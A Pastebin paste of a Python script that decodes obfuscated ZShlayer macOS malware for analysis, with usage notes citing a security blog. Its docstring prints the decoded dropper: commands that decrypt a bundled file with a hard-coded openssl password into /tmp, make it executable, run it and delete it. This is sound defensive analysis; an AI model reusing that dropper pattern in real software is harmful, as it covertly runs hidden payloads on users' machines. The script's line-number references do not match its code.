applehelpwriter

ZShlayer Malware Decode Script

Sep 8th, 2020 (edited)
357
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python3
  2.  
  3. """
  4. This script takes an obfuscated ZShlayer executable ("the target file") and enables its output to be read in plain text.
  5. See: https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer
  6.  
  7. 1. prep the target file by first saving it with linebreaks after every SEMICOLON
  8.     e.g., search and replace ";" with ";\n"
  9.  
  10. 2. change line 56 below to the path to the target file
  11.  
  12. 3. change line 63 below by getting the obfuscated function name from the last two lines of the target file (see the post cited above for more details).
  13.  
  14. 4. run this script in Terminal and save output to a variable, then use printf $variable to get the unicode to print out in ascii.
  15.     eg., output=`./decode_zsh_script.py`
  16.          printf $output
  17.  
  18. Output should be something along these lines:
  19.  
  20.    cd "$(dirname "$0")"&&fileDir="$(dirname "$(pwd -P)")"&&cd "$fileDir/Resources"
  21.    sf1="/tmp/$RANDOM.sh"
  22.    openssl enc -base64 -d -aes-256-cbc -nosalt -pass "pass:10560469046"<undercharge_multidimensional_Berettas >    
  23.     "$sf1"
  24.    chmod 777 "$sf1"
  25.    "$sf1"
  26.    rm "$sf1"';'
  27.    
  28. """
  29.  
  30. def getClearForLine(l):
  31.     if "=" in l:
  32.         cs = l.split("=")
  33.         obscure = cs[0]
  34.         clr = cs[1][:-2]
  35.         clr.strip()
  36.         clr = clr+"\'"
  37.         obscure.strip()
  38.         return obscure,clr
  39.     else:
  40.         return l,l
  41.    
  42.    
  43. searchArray = []
  44. f = open("/Users/user/Desktop/railleries", "r")     # adjust as required
  45. filedata = f.read()
  46. f.close()
  47.  
  48. linesplit = "\n"
  49. lines = filedata.split(linesplit)
  50. for l in lines:
  51.     if "TWm" not in l:                  # replace with variable name used in your ZShlayer script; see note 3 above
  52.         obs,clr = getClearForLine(l)
  53.         searchArray.append([obs,clr])
  54.  
  55. for ob,cl in searchArray:
  56.     filedata = filedata.replace(ob, (cl))
  57.  
  58. scr = filedata.split("\n")
  59. str = ""
  60. for s in scr:
  61.     if len(s) > 0:
  62.         if "$" in s:
  63.             str = str+s
  64. str = str.replace("\'}${\'", "")
  65. str = str.replace("$", "")
  66. str = str.replace("})", "")
  67. str = str.replace("({", "")
  68. str = str.replace("\'} {\'", " ")
  69. scrpts = str.split("echo -e")
  70.  
  71. for sc in scrpts:
  72.     if len(sc) > 0:
  73.         if "\\" in sc[0:2]:
  74.             s = sc[1:]
  75.             print(u"{}".format(s))
  76.            
  77.  
RAW Paste Data